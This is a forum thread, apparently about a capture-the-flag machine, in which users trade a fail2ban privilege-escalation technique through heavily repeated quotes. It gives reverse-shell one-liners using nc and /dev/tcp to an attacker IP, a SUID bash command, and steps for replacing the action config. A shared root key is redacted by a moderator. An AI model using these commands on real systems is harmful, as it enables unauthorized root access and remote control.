Posts: 19 Threads: 0 Joined: N/A (June 19, 2022, 05:10 PM)wayxoo Wrote: (June 19, 2022, 05:04 PM)ryzen Wrote: (June 19, 2022, 04:37 PM)Toto Wrote: Can't seem to simulate the 10 requests, I get ssh errors using hydra
It worked for me despite the errors. All that needs to happen is that the request needs to hit the machine
hey, i edited the /etc/fail2ban/action.d/iptables-multiport.conf at the actionban variable like this:
actionunban = /usr/bin/nc IP PORT -e /usr/bin/bash
also tried the bash revshell
actionunban = bash -i >& /dev/tcp/IP/PORT 0>&1
doesnt hit me back at all, the 10 ssh requests seems passed well cuz i got banned did you restart the service? sudo /etc/init.d/fail2ban restart
(June 19, 2022, 04:29 PM)ryzen Wrote: (June 19, 2022, 02:53 PM)Truss46 Wrote: (June 19, 2022, 02:47 PM)netrise Wrote: (June 19, 2022, 02:40 PM)Truss46 Wrote: (June 19, 2022, 02:05 PM)loge23 Wrote: Privesc: https://youssef-ichioui.medium.com/abusing-fail2ban-misconfiguration-to-escalate-privileges-on-linux-826ad0cdafb7
I don't have permissions to write in actions.d folder
Only to create new actions
how did you edit the "iptables-multiport.conf" file?
You can delete and recreate the file thanks that got me to root :) Posts: 45 Threads: 0 Joined: N/A Posts: 36 Threads: 0 Joined: N/A (June 19, 2022, 05:13 PM)Truss46 Wrote: (June 19, 2022, 05:10 PM)wayxoo Wrote: (June 19, 2022, 05:04 PM)ryzen Wrote: (June 19, 2022, 04:37 PM)Toto Wrote: Can't seem to simulate the 10 requests, I get ssh errors using hydra
It worked for me despite the errors. All that needs to happen is that the request needs to hit the machine
hey, i edited the /etc/fail2ban/action.d/iptables-multiport.conf at the actionban variable like this:
actionunban = /usr/bin/nc IP PORT -e /usr/bin/bash
also tried the bash revshell
actionunban = bash -i >& /dev/tcp/IP/PORT 0>&1
doesnt hit me back at all, the 10 ssh requests seems passed well cuz i got banned
did you restart the service?
sudo /etc/init.d/fail2ban restart
Yeah I did, not working either. I'm probably missing something, just need to find out what it is. Posts: 22 Threads: 0 Joined: N/A  (June 19, 2022, 05:13 PM)Truss46 Wrote: (June 19, 2022, 05:10 PM)wayxoo Wrote: (June 19, 2022, 05:04 PM)ryzen Wrote: (June 19, 2022, 04:37 PM)Toto Wrote: Can't seem to simulate the 10 requests, I get ssh errors using hydra
It worked for me despite the errors. All that needs to happen is that the request needs to hit the machine
hey, i edited the /etc/fail2ban/action.d/iptables-multiport.conf at the actionban variable like this:
actionunban = /usr/bin/nc IP PORT -e /usr/bin/bash
also tried the bash revshell
actionunban = bash -i >& /dev/tcp/IP/PORT 0>&1
doesnt hit me back at all, the 10 ssh requests seems passed well cuz i got banned
did you restart the service?
sudo /etc/init.d/fail2ban restart
(June 19, 2022, 04:29 PM)ryzen Wrote: (June 19, 2022, 02:53 PM)Truss46 Wrote: (June 19, 2022, 02:47 PM)netrise Wrote: (June 19, 2022, 02:40 PM)Truss46 Wrote: I don't have permissions to write in actions.d folder
Only to create new actions
how did you edit the "iptables-multiport.conf" file?
You can delete and recreate the file
thanks that got me to root :) That file gets recreated when the service is restarted? How did you get a reverse shell? I am able to copy my malicious file with the rev shell but restarting it just removes that file. Posts: 4 Threads: 0 Joined: N/A June 19, 2022 at 10:42 PM (June 19, 2022, 07:11 PM)mimikatz Wrote: (June 19, 2022, 05:13 PM)Truss46 Wrote: (June 19, 2022, 05:10 PM)wayxoo Wrote: (June 19, 2022, 05:04 PM)ryzen Wrote: (June 19, 2022, 04:37 PM)Toto Wrote: Can't seem to simulate the 10 requests, I get ssh errors using hydra
It worked for me despite the errors. All that needs to happen is that the request needs to hit the machine
hey, i edited the /etc/fail2ban/action.d/iptables-multiport.conf at the actionban variable like this:
actionunban = /usr/bin/nc IP PORT -e /usr/bin/bash
also tried the bash revshell
actionunban = bash -i >& /dev/tcp/IP/PORT 0>&1
doesnt hit me back at all, the 10 ssh requests seems passed well cuz i got banned
did you restart the service?
sudo /etc/init.d/fail2ban restart
(June 19, 2022, 04:29 PM)ryzen Wrote: (June 19, 2022, 02:53 PM)Truss46 Wrote: (June 19, 2022, 02:47 PM)netrise Wrote: Only to create new actions
how did you edit the "iptables-multiport.conf" file?
You can delete and recreate the file
thanks that got me to root :)
That file gets recreated when the service is restarted? How did you get a reverse shell? I am able to copy my malicious file with the rev shell but restarting it just removes that file. Try this actionban = cp /usr/bin/bash /home/michael && chmod 4755 /home/michael/bash --> ~/bash -p
Posts: 104 Threads: 0 Joined: N/A (June 19, 2022, 10:42 PM)kezekiel Wrote: (June 19, 2022, 07:11 PM)mimikatz Wrote: (June 19, 2022, 05:13 PM)Truss46 Wrote: (June 19, 2022, 05:10 PM)wayxoo Wrote: (June 19, 2022, 05:04 PM)ryzen Wrote: It worked for me despite the errors. All that needs to happen is that the request needs to hit the machine
hey, i edited the /etc/fail2ban/action.d/iptables-multiport.conf at the actionban variable like this:
actionunban = /usr/bin/nc IP PORT -e /usr/bin/bash
also tried the bash revshell
actionunban = bash -i >& /dev/tcp/IP/PORT 0>&1
doesnt hit me back at all, the 10 ssh requests seems passed well cuz i got banned
did you restart the service?
sudo /etc/init.d/fail2ban restart
(June 19, 2022, 04:29 PM)ryzen Wrote: (June 19, 2022, 02:53 PM)Truss46 Wrote: how did you edit the "iptables-multiport.conf" file?
You can delete and recreate the file
thanks that got me to root :)
That file gets recreated when the service is restarted? How did you get a reverse shell? I am able to copy my malicious file with the rev shell but restarting it just removes that file.
Try this
actionban = cp /usr/bin/bash /home/michael && chmod 4755 /home/michael/bash --> ~/bash -p
lol why cp when u giving suid permission to /bin/bash Posts: 59 Threads: 0 Joined: N/A (June 19, 2022, 07:11 PM)mimikatz Wrote: (June 19, 2022, 05:13 PM)Truss46 Wrote: (June 19, 2022, 05:10 PM)wayxoo Wrote: (June 19, 2022, 05:04 PM)ryzen Wrote: (June 19, 2022, 04:37 PM)Toto Wrote: Can't seem to simulate the 10 requests, I get ssh errors using hydra
It worked for me despite the errors. All that needs to happen is that the request needs to hit the machine
hey, i edited the /etc/fail2ban/action.d/iptables-multiport.conf at the actionban variable like this:
actionunban = /usr/bin/nc IP PORT -e /usr/bin/bash
also tried the bash revshell
actionunban = bash -i >& /dev/tcp/IP/PORT 0>&1
doesnt hit me back at all, the 10 ssh requests seems passed well cuz i got banned
did you restart the service?
sudo /etc/init.d/fail2ban restart
(June 19, 2022, 04:29 PM)ryzen Wrote: (June 19, 2022, 02:53 PM)Truss46 Wrote: (June 19, 2022, 02:47 PM)netrise Wrote: Only to create new actions
how did you edit the "iptables-multiport.conf" file?
You can delete and recreate the file
thanks that got me to root :)
That file gets recreated when the service is restarted? How did you get a reverse shell? I am able to copy my malicious file with the rev shell but restarting it just removes that file. no, it's not recreated on service restart. there's seems to be another cron which recreates those files. how i did this: delete targeted .conf file, copy your malicious file, restart the service, wait for approximately 1 min., attack ssh and it works... Posts: 32 Threads: 0 Joined: N/A (June 20, 2022, 05:54 AM)undeadly Wrote: (June 19, 2022, 07:11 PM)mimikatz Wrote: (June 19, 2022, 05:13 PM)Truss46 Wrote: (June 19, 2022, 05:10 PM)wayxoo Wrote: (June 19, 2022, 05:04 PM)ryzen Wrote: It worked for me despite the errors. All that needs to happen is that the request needs to hit the machine
hey, i edited the /etc/fail2ban/action.d/iptables-multiport.conf at the actionban variable like this:
actionunban = /usr/bin/nc IP PORT -e /usr/bin/bash
also tried the bash revshell
actionunban = bash -i >& /dev/tcp/IP/PORT 0>&1
doesnt hit me back at all, the 10 ssh requests seems passed well cuz i got banned
did you restart the service?
sudo /etc/init.d/fail2ban restart
(June 19, 2022, 04:29 PM)ryzen Wrote: (June 19, 2022, 02:53 PM)Truss46 Wrote: how did you edit the "iptables-multiport.conf" file?
You can delete and recreate the file
thanks that got me to root :)
That file gets recreated when the service is restarted? How did you get a reverse shell? I am able to copy my malicious file with the rev shell but restarting it just removes that file.
no, it's not recreated on service restart. there's seems to be another cron which recreates those files.
how i did this:
delete targeted .conf file, copy your malicious file, restart the service, wait for approximately 1 min., attack ssh and it works...
it's easy box, so for those who can't exploit fail2ban, here is id_rsa_root: i still take a root access/privesc Posts: 22 Threads: 0 Joined: N/A (June 19, 2022, 02:40 PM)Truss46 Wrote: (June 19, 2022, 02:05 PM)loge23 Wrote: Privesc: https://youssef-ichioui.medium.com/abusing-fail2ban-misconfiguration-to-escalate-privileges-on-linux-826ad0cdafb7
I don't have permissions to write in actions.d folder /etc/fail2ban/action.d/./iptables-multiport.conf? ☠ fuck ☠ Posts: 73 Threads: 0 Joined: N/A (June 20, 2022, 05:54 AM)undeadly Wrote: it's easy box, so for those who can't exploit fail2ban, here is id_rsa_root:
REDACTED Please edit and remove asap the SSH key in your post. It's not longer allow to post any private key here. Previously that will be explained by @ Internetdreams then please follow. |
